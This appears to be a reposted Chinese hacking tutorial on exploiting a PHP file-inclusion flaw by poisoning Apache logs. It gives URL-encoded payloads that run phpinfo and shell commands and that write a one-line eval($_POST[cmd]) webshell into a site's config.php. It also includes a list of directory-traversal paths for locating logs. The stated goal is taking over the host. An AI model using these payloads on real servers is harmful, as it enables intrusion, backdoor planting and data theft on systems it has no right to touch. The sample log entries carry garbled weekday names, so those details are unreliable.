本文共 6449 字,大约阅读时间需要 21 分钟。
信息来源: 文章作者:zizzy 关于php包含Apache日志的利用,其实也就是利用提交的网址里有php语句,然后再被Apache服务器的日志记录,然后php再去包含执行,从而包含了去执行。当然,这种办法最大的弊端是Apache日志肯定会过大,回应的时候当然会超时什么的,所以也是受条件限制的。全当一种研究算了。下面是我的测试过程,我觉得很有意思,你也看看。 比如说,在一个php存在包含漏洞就像这样,存在一句php包含漏洞的语句 <? include($zizzy); ?> //包含变量$zizzy 你可以 就可以利用包含语句来查看一些系统环境和密码档文件。 那么关于日志包含下面我们来看: 比如我们的Apache的服务器配置文件位置在这里 /usr/local/apache/conf/httpd.conf 那么我们来包含一下httpd.conf,来看下路径信息什么的 读出Apache的配置信息,这里列出部分信息。 <VirtualHost 218.63.89.2> User #3 Group silver ServerAdmin DocumentRoot /home/virtual/www.xxx.com ServerName ServerAlias xxx.com ErrorLog /home/virtual/www.xxx.com/logs/www-error_log CustomLog /home/virtual/www.xxx.com/logs/www-access_log common ScriptAlias /cgi-bin/ /home/virtual/www.xxx.com/cgi-bin/ Alias /icons/ /home/virtual/www.xxx.com/icons </VirtualHost> 而我们提交 就可以读出Apache的错误日志记录 [Mon Jan 22 14:01:16 2005] [error] [client 218.63.194.76] File does not exist: /home/virtual/www.xxx.com/hack.php [Tus Jan 22 19:36:54 2005] [error] [client 218.63.148.38] File does not exist: /home/virtual/www.xxx.com/111111111.php [Wen Jan 23 05:14:54 2005] [error] [client 218.63.235.129] File does not exist: /home/virtual/www.xxx.com/22222.php3 [Wen Jan 23 16:25:04 2005] [error] [client 218.63.232.73] attempt to invoke directory as script: /home/virtual/www.xxx.com/forum [Fir Jan 26 19:43:45 2005] [error] [client 218.63.232.73] attempt to invoke directory as script: /home/virtual/www.xxx.com/blog [Fir Jan 26 19:43:46 2005] [error] [client 64.229.232.73] attempt to invoke directory as script: /home/virtual/www.xxx.com/kkkkkkkk 而数据日志/home/virtual/www.xxx.com/logs/www-access_log也是一样的,一样可以读出来,只不过文件会很大,那也没意思测试下去了,那怎么利用呢。 比如我们提交要提交这句,<?phpinfo();?> //查看php的相关信息 在这里,我们只能提交URL编码模式,因为我在测试中发现,<?的标记并不被记录,只有转换成URL编码提交才会被完整记录。 在这里%3C%3Fphpinfo%28%29%3B%3F%3E这句就是转换过了的<?phpinfo();?>,我们提交 这样肯定会报出错找不到页面,而一出错就被记在错误日志里了 这样这个日志文件就被包含成了phpinfo的信息,而回显也就成了一个显示php信息的页面。 如果可以的话(能够执行系统命令,也就是safe_mode开着的时候), 这样子也不错, <?system("ls+-la+/home");?> //执行命令列出home下的文件列表,记得转换为URL格式哦。 /home/ total 9 -rw-r--r-- 1 silver 55 Jan 20 23:01 about.php drwxrwxrwx 4 silver 4096 Jan 21 06:07 abc -rw-r--r-- 1 silver 1438 Dec 3 07:39 index.php -rwxrwxrwx 1 silver 5709 Jan 21 20:05 show.php -rw-r--r-- 1 silver 5936 Jan 18 01:37 admin.php -rwxrwxrwx 1 silver 5183 Jan 18 15:30 config.php3 -rw-rw-rw- 1 silver 102229 Jan 21 23:18 info.txt drwxr-xr-x 2 silver 4096 Jan 8 16:03 backup -rw-r--r-- 1 silver 7024 Dec 4 03:07 test.php 这样就列出了home下的文件 或者直接一句话木马<?eval($_POST[cmd]);?>, 这样转换后就是%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E 这样的格式。 我们提交 再用lanker的一句话木马客户端一连就OK了。 因为上面那个很不实际,我在测试中发现日志动不动就是几十兆,那样玩起来也没意思了。下面想的再深入一点也就是我们写入一个很实际的webshell来用,也比上面那种慢的要死好很多。 比如还是这句一句话木马 <?eval($_POST[cmd]);?> 到这里你也许就想到了,这是个很不错的办法。接着看,如何写入就成了个问题,用这句, fopen打开/home/virtual/www.xxx.com/forum/config.php这个文件,然后写入<?eval($_POST[cmd]);?>这个一句话木马服务端语句。连起来表达成php语句就是 <?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");fclose($fp);?> //在config.php里写入一句木马语句 我们提交这句,再让Apache记录到错误日志里,再包含就成功写入shell,记得一定要转换成URL格式才成功。 转换为 %3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E 我们提交 这样就错误日志里就记录下了这行写入webshell的代码。 我们再来包含日志,提交 这样webshell就写入成功了,config.php里就写入一句木马语句 OK. 这个就成了我们的webshell 直接用lanker的客户端一连,主机就是你的了。 PS:上面讲的,前提是文件夹权限必须可写 ,一定要-rwxrwxrwx(777)才能继续,这里直接用上面列出的目录来查看。上面讲的都是在知道日志路径的情况下的利用 其他的日志路径,你可以去猜,也可以参照这里。 附: 收集的一些日志路径 ../../../../../../../../../../var/log/httpd/access_log ../../../../../../../../../../var/log/httpd/error_log ../apache/logs/error.log ../apache/logs/access.log ../../apache/logs/error.log ../../apache/logs/access.log ../../../apache/logs/error.log ../../../apache/logs/access.log ../../../../../../../../../../etc/httpd/logs/acces_log ../../../../../../../../../../etc/httpd/logs/acces.log ../../../../../../../../../../etc/httpd/logs/error_log ../../../../../../../../../../etc/httpd/logs/error.log ../../../../../../../../../../var/www/logs/access_log ../../../../../../../../../../var/www/logs/access.log ../../../../../../../../../../usr/local/apache/logs/access_log ../../../../../../../../../../usr/local/apache/logs/access.log ../../../../../../../../../../var/log/apache/access_log ../../../../../../../../../../var/log/apache/access.log ../../../../../../../../../../var/log/access_log ../../../../../../../../../../var/www/logs/error_log ../../../../../../../../../../var/www/logs/error.log ../../../../../../../../../../usr/local/apache/logs/error_log ../../../../../../../../../../usr/local/apache/logs/error.log ../../../../../../../../../../var/log/apache/error_log ../../../../../../../../../../var/log/apache/error.log ../../../../../../../../../../var/log/access_log ../../../../../../../../../../var/log/error_log /var/log/httpd/access_log /var/log/httpd/error_log ../apache/logs/error.log ../apache/logs/access.log ../../apache/logs/error.log ../../apache/logs/access.log ../../../apache/logs/error.log ../../../apache/logs/access.log /etc/httpd/logs/acces_log /etc/httpd/logs/acces.log /etc/httpd/logs/error_log /etc/httpd/logs/error.log /var/www/logs/access_log /var/www/logs/access.log /usr/local/apache/logs/access_log /usr/local/apache/logs/access.log /var/log/apache/access_log /var/log/apache/access.log /var/log/access_log /var/www/logs/error_log /var/www/logs/error.log /usr/local/apache/logs/error_log /usr/local/apache/logs/error.log /var/log/apache/error_log /var/log/apache/error.log /var/log/access_log /var/log/error_log <script type=text/javascript>var tagarray = ['逆向工程','IIS','Oracle','机器狗','感染','驱动编程','百度','隐藏驱动','PeakSharp','源代码','飘絮','收集','rsa','90hackit','ratproxy','招聘','猎头','属主','DDoS','内核编程','Microsoft','Overflow','WPS','Office','Buffer','Serv-U','DataExplorer','EasyRecovery','Ghost','数据恢复','手机号','XSS'];var tagencarray = ['%E9%80%86%E5%90%91%E5%B7%A5%E7%A8%8B','IIS','Oracle','%E6%9C%BA%E5%99%A8%E7%8B%97','%E6%84%9F%E6%9F%93','%E9%A9%B1%E5%8A%A8%E7%BC%96%E7%A8%8B','%E7%99%BE%E5%BA%A6','%E9%9A%90%E8%97%8F%E9%A9%B1%E5%8A%A8','PeakSharp','%E6%BA%90%E4%BB%A3%E7%A0%81','%E9%A3%98%E7%B5%AE','%E6%94%B6%E9%9B%86','rsa','90hackit','ratproxy','%E6%8B%9B%E8%81%98','%E7%8C%8E%E5%A4%B4','%E5%B1%9E%E4%B8%BB','DDoS','%E5%86%85%E6%A0%B8%E7%BC%96%E7%A8%8B','Microsoft','Overflow','WPS','Office','Buffer','Serv-U','DataExplorer','EasyRecovery','Ghost','%E6%95%B0%E6%8D%AE%E6%81%A2%E5%A4%8D','%E6%89%8B%E6%9C%BA%E5%8F%B7','XSS'];parsetag();</script>转载地址:http://dummb.baihongyu.com/